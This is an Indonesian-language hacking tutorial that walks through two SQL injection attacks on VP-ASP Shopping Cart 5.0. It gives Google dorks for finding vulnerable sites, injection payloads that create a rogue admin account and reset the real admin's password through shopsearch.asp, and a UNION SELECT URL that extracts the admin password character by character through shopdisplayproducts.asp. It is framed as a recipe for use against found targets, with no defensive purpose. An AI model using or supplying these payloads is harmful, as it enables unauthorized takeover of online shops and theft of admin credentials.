‘`%%`%%`%%,`%%’`% Materi ke-10 : VP-ASP Shopping Cart 5.0 Cara I`%%`%%`%%,`%%’`% ‘
!NB : SQL Injection vulnerability pada script ’shopsearch.asp’
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopsearch.asp
2. Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values (”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where fldusername=”–&SubCategory=All&action.x=33&action.y=6
jangan lupa untuk mengganti dan sesuai selera!:
3. Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
4. Untuk login admin, ada di http://…/vpasp/shopadmin.asp

‘`%%`%%`%%,`%%’`% Materi ke-10 : VP-ASP Shopping Cart 5.0 Cara II`%%`%%`%%,`%%’`% ‘
!NB : SQL Injection vulnerability pada script ’shopdisplayproducts.asp’
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopdisplayproducts.asp
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopdisplayproducts.asp
2. Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
http://…/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername=’admin’%20and%20fldpassword%20like%20′a%25′–
3. Ganti²lah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
dst…
4. Naah.. kalau berhasil, kita akan mendapatkan informasi username dan password admin!
5. Untuk login admin ke http://…/vpasp/shopadmin.asp
6. Demikanlah, Materi ke-10 Selesai.